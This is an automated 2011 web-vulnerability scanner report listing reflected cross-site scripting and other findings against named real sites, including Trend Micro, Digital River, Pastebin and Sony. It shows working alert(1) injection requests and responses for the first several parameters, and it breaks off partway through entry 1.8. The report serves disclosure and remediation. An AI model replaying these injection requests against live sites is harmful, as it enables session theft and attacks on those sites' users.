XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09072011-03 Report generated by XSS.CX at Wed Sep 07 14:16:34 GMT-06:00 2011.
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
1. Cross-site scripting (reflected)
1.1. http://blog.trendmicro.com/ [s parameter]
1.2. http://display.digitalriver.com/ [aid parameter]
1.3. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]
1.4. http://display.digitalriver.com/ [tax parameter]
1.5. http://pastebin.com/bq8xJPMn [REST URL parameter 1]
1.6. http://pastebin.com/bq8xJPMn [name of an arbitrarily supplied request parameter]
1.7. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 1]
1.8. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 2]
1.9. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 3]
1.10. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 4]
1.11. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 1]
1.12. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 2]
1.13. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 3]
1.14. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 4]
1.15. http://pastebin.com/etc/social/index.html [REST URL parameter 1]
1.16. http://pastebin.com/etc/social/index.html [REST URL parameter 2]
1.17. http://pastebin.com/etc/social/index.html [REST URL parameter 3]
1.18. http://pastebin.com/favicon.ico [REST URL parameter 1]
1.19. http://pastebin.com/i/fixed.css [REST URL parameter 1]
1.20. http://pastebin.com/i/fixed.css [REST URL parameter 2]
1.21. http://pastebin.com/i/style.css [REST URL parameter 1]
1.22. http://pastebin.com/i/style.css [REST URL parameter 2]
1.23. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 1]
1.24. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 2]
1.25. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntk parameter]
1.26. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]
1.27. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]
1.28. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [name of an arbitrarily supplied request parameter]
1.29. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [x parameter]
1.30. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [y parameter]
1.31. https://store.trendmicro.com/DRHM/store [name of an arbitrarily supplied request parameter]
1.32. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452524 parameter]
1.33. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452525 parameter]
1.34. http://wd.sharethis.com/api/getCount2.php [cb parameter]
1.35. http://webconnect.sendouts.com/candidate/my-profile.aspx [Group parameter]
1.36. http://webconnect.sendouts.com/forgot-login.aspx [Group parameter]
1.37. http://webconnect.sendouts.com/job-search.aspx [Group parameter]
1.38. http://webconnect.sendouts.com/login.aspx [Group parameter]
1.39. https://www.ca.com/us/register/login.aspx [returnURL parameter]
1.40. http://www.javalobby.org/articles/acegisecurity/part1.jsp [name of an arbitrarily supplied request parameter]
1.41. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [cmd parameter]
1.42. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [dialogID parameter]
1.43. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docType parameter]
1.44. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docTypeID parameter]
1.45. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [name of an arbitrarily supplied request parameter]
1.46. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]
1.47. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]
1.48. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [stateId parameter]
1.49. http://www.typepad.com/services/toolbar [autofollowed parameter]
2. Flash cross-domain policy
2.1. http://www.viddler.com/crossdomain.xml
2.2. http://blog.trendmicro.com/crossdomain.xml
2.3. http://wd.sharethis.com/crossdomain.xml
2.4. http://www.typepad.com/crossdomain.xml
3. Cleartext submission of password
3.1. http://webconnect.sendouts.com/login.aspx
3.2. http://www.javalobby.org/articles/acegisecurity/part1.jsp
3.3. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
4. Session token in URL
4.1. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay
4.2. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
4.3. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
4.4. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
5. Password field submitted using GET method
6. ASP.NET ViewState without MAC enabled
6.1. http://webconnect.sendouts.com/forgot-login.aspx
6.2. http://webconnect.sendouts.com/job-search.aspx
6.3. http://webconnect.sendouts.com/login.aspx
7. Cookie without HttpOnly flag set
7.1. http://www.kb.sony.com/
7.2. http://www.kb.sony.com/selfservice/closeviewdocument.do
7.3. http://www.kb.sony.com/selfservice/common/extIFrame.jsp
7.4. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp
7.5. http://www.kb.sony.com/selfservice/common/viewdocument_appHeader.jsp
7.6. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Metadata.jsp
7.7. http://www.kb.sony.com/selfservice/getUMBrowseImageById.do
7.8. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/
7.9. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg
7.10. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg
7.11. http://store.sony.com/webapp/wcs/stores/servlet/SYErrorRedirect
7.12. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax
7.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
7.14. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js
7.15. https://www.ca.com/siteminderagent/forms/login.fcc
7.16. https://www.ca.com/us/register/login.aspx
8. Password field with autocomplete enabled
8.1. http://webconnect.sendouts.com/login.aspx
8.2. https://www.ca.com/us/register/createprofile.aspx
8.3. https://www.ca.com/us/register/login.aspx
8.4. https://www.ca.com/us/register/login.aspx
8.5. https://www.ca.com/us/register/login.aspx
8.6. https://www.ca.com/us/register/login.aspx
8.7. https://www.ca.com/us/register/login.aspx
8.8. http://www.javalobby.org/articles/acegisecurity/part1.jsp
8.9. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
9. Referer-dependent response
9.1. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
9.2. http://www.viddler.com/embed/dca1712/
9.3. http://www.viddler.com/player/dca1712/0
10. SSL cookie without secure flag set
10.1. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js
10.2. https://www.ca.com/siteminderagent/forms/login.fcc
10.3. https://www.ca.com/us/register/login.aspx
11. Cookie scoped to parent domain
11.1. https://www.ca.com/siteminderagent/forms/login.fcc
11.2. https://www.ca.com/us/register/login.aspx
12. Cross-domain Referer leakage
12.1. http://blog.trendmicro.com/
12.2. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js
12.3. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay
12.4. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
12.5. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
12.6. https://store.trendmicro.com/DRHM/store
12.7. https://store.trendmicro.com/store
12.8. https://www.ca.com/us/register/createprofile.aspx
12.9. https://www.ca.com/us/register/login.aspx
12.10. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp
12.11. http://www.kb.sony.com/selfservice/microsites/search.do
12.12. http://www.kb.sony.com/selfservice/microsites/searchEntry.do
13. Cross-domain script include
13.1. http://blog.trendmicro.com/
13.2. http://blog.trendmicro.com/a-snapshot-of-android-threats-infographic/
13.3. http://blog.trendmicro.com/blackhat-2011-dangers-of-embedded-web-servers/
13.4. http://blog.trendmicro.com/category/exploits/
13.5. http://blog.trendmicro.com/category/pharming/
13.6. http://blog.trendmicro.com/trend-micro-researchers-identify-vulnerability-in-hotmail/
13.7. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js
13.8. http://pastebin.com/bq8xJPMn
13.9. http://pastebin.com/etc/ads/iframes/160x600.html
13.10. http://pastebin.com/etc/ads/iframes/728x90.html
13.11. http://pastebin.com/etc/social/index.html
13.12. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay
13.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
13.14. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
13.15. https://store.trendmicro.com/DRHM/store
13.16. https://store.trendmicro.com/store
13.17. https://www.ca.com/us/register/createprofile.aspx
13.18. https://www.ca.com/us/register/forgotpassword.aspx
13.19. https://www.ca.com/us/register/login.aspx
13.20. http://www.javalobby.org/articles/acegisecurity/part1.jsp
13.21. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
14. TRACE method is enabled
15. Email addresses disclosed
15.1. http://blog.trendmicro.com/wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js
15.2. http://pastebin.com/bq8xJPMn
15.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js
15.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js
15.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js
15.6. https://www.ca.com/us/register/createprofile.aspx
15.7. https://www.ca.com/us/register/forgotpassword.aspx
15.8. https://www.ca.com/us/register/login.aspx
15.9. http://www.kb.sony.com/selfservice/jslib/CalendarPopup.js
16. Private IP addresses disclosed
16.1. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js
16.2. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js
16.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js
16.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js
16.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js
17. Robots.txt file
17.1. http://blog.trendmicro.com/
17.2. http://display.digitalriver.com/
17.3. http://pastebin.com/i/fixed.css
17.4. https://store.trendmicro.com/store
17.5. http://www.javalobby.org/articles/acegisecurity/part1.jsp
17.6. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
17.7. http://www.viddler.com/embed/dca1712/
18. Cacheable HTTPS response
19. HTML does not specify charset
19.1. http://display.digitalriver.com/
19.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax
19.3. http://wd.sharethis.com/api/getCount2.php
19.4. http://www.kb.sony.com/selfservice/common/bg_323232.html
20. Content type incorrectly stated
20.1. http://display.digitalriver.com/
20.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax
20.3. https://store.trendmicro.com/favicon.ico
20.4. http://wd.sharethis.com/api/getCount2.php
20.5. https://www.ca.com/images/icons/checkmark.gif
20.6. http://www.javaworld.com/favicon.ico
21. Content type is not specified
21.1. http://www.javalobby.org/favicon.ico
21.2. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1
21.3. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1
21.4. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1
22. SSL certificate
22.1. https://store.trendmicro.com/
22.2. https://www.ca.com/
1. Cross-site scripting (reflected)
next
There are 49 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method). The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://blog.trendmicro.com/ [s parameter]
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/
Issue detail
The value of the s request parameter is copied into the HTML document as plain text between tags. The payload 60122<script>alert(1)</script>7e9986f3a17 was submitted in the s parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?s=xss60122<script>alert(1)</script>7e9986f3a17 &Submit=+Go+ HTTP/1.1 Host: blog.trendmicro.com Proxy-Connection: keep-alive Referer: http://blog.trendmicro.com/category/exploits/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.3.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=3; bn_u=6923713914570485926; cmRS=&t1=1315351005853&t2=1315351007808&t3=-1&t4=1315351004379&fti=1315351012197&fn=UNDEFINED%3A0%3B&ac=0:S&fd=0%3A1%3ASubmit%3B0%3A0%3As%3B&uer=&fu=/&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/category/exploits/&rf=http%3A//blog.trendmicro.com/a-snapshot-of-android-threats-infographic/
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Content-Type: text/html; charset=UTF-8 Pragma: no-cache X-Pingback: http://blog.trendmicro.com/xmlrpc.php test : test X-Mobilized-By: WordPress Mobile Pack 1.2.4 X-Varnish: 1696292975 Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Tue, 06 Sep 2011 18:17:33 GMT Date: Tue, 06 Sep 2011 18:17:33 GMT Content-Length: 39428 Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profile="http:...[SNIP]... </a> > Search Results for xss60122<script>alert(1)</script>7e9986f3a17 <br />...[SNIP]...
1.2. http://display.digitalriver.com/ [aid parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://display.digitalriver.com
Path:
/
Issue detail
The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6c82'-alert(1)-'417cdac0750 was submitted in the aid parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aid=244a6c82'-alert(1)-'417cdac0750 &tax=trend_micro HTTP/1.1 Host: display.digitalriver.com Proxy-Connection: keep-alive Referer: http://us.trendmicro.com/us/home/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 18:13:06 GMT Server: Apache/2.2.9 Expires: Tue, 06 Sep 2011 18:43:06 GMT Last-Modified: Tue, 06 Sep 2011 18:13:06 GMT Content-Length: 234 Connection: close Content-Type: text/html var dgt_script = document.createElement('SCRIPT'); dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244a6c82'-alert(1)-'417cdac0750 &tax=trend_micro'; document.getElementsByTagName('head')[0].appendChild(dgt_script);
1.3. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://display.digitalriver.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a55b'-alert(1)-'0024805587a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aid=244&tax=trend_micro&8a55b'-alert(1)-'0024805587a =1 HTTP/1.1 Host: display.digitalriver.com Proxy-Connection: keep-alive Referer: http://us.trendmicro.com/us/home/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 18:13:08 GMT Server: Apache/2.2.9 Expires: Tue, 06 Sep 2011 18:43:08 GMT Last-Modified: Tue, 06 Sep 2011 18:13:08 GMT Content-Length: 237 Connection: close Content-Type: text/html var dgt_script = document.createElement('SCRIPT'); dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro&8a55b'-alert(1)-'0024805587a =1'; document.getElementsByTagName('head')[0].appendChild(dgt_script);
1.4. http://display.digitalriver.com/ [tax parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://display.digitalriver.com
Path:
/
Issue detail
The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76aea'-alert(1)-'2f2fe981849 was submitted in the tax parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aid=244&tax=trend_micro76aea'-alert(1)-'2f2fe981849 HTTP/1.1 Host: display.digitalriver.com Proxy-Connection: keep-alive Referer: http://us.trendmicro.com/us/home/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 18:13:07 GMT Server: Apache/2.2.9 Expires: Tue, 06 Sep 2011 18:43:07 GMT Last-Modified: Tue, 06 Sep 2011 18:13:07 GMT Content-Length: 234 Connection: close Content-Type: text/html var dgt_script = document.createElement('SCRIPT'); dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro76aea'-alert(1)-'2f2fe981849 '; document.getElementsByTagName('head')[0].appendChild(dgt_script);
1.5. http://pastebin.com/bq8xJPMn [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/bq8xJPMn
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75bda"><script>alert(1)</script>e6654f051f5 was submitted in the REST URL parameter 1. This input was echoed as 75bda\"><script>alert(1)</script>e6654f051f5 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bq8xJPMn75bda"><script>alert(1)</script>e6654f051f5 HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:40 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=24; expires=Tue, 04-Oct-2011 18:10:40 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10554 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/bq8xJPMn75bda\"><script>alert(1)</script>e6654f051f5 "/>...[SNIP]...
1.6. http://pastebin.com/bq8xJPMn [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/bq8xJPMn
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba897"><script>alert(1)</script>b386f4c98c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba897\"><script>alert(1)</script>b386f4c98c8 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bq8xJPMn?ba897"><script>alert(1)</script>b386f4c98c8 =1 HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:40 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=22; expires=Tue, 04-Oct-2011 18:10:40 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10560 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/bq8xJPMn?ba897\"><script>alert(1)</script>b386f4c98c8 =1"/>...[SNIP]...
1.7. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/160x600.html
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd4be"><script>alert(1)</script>1b7c01d5428 was submitted in the REST URL parameter 1. This input was echoed as fd4be\"><script>alert(1)</script>1b7c01d5428 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /etcfd4be"><script>alert(1)</script>1b7c01d5428 /ads/iframes/160x600.html HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:38 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=17; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10613 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/etcfd4be\"><script>alert(1)</script>1b7c01d5428 /ads/iframes/160x600.html"/>...[SNIP]...
1.8. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/160x600.html
Issue detail
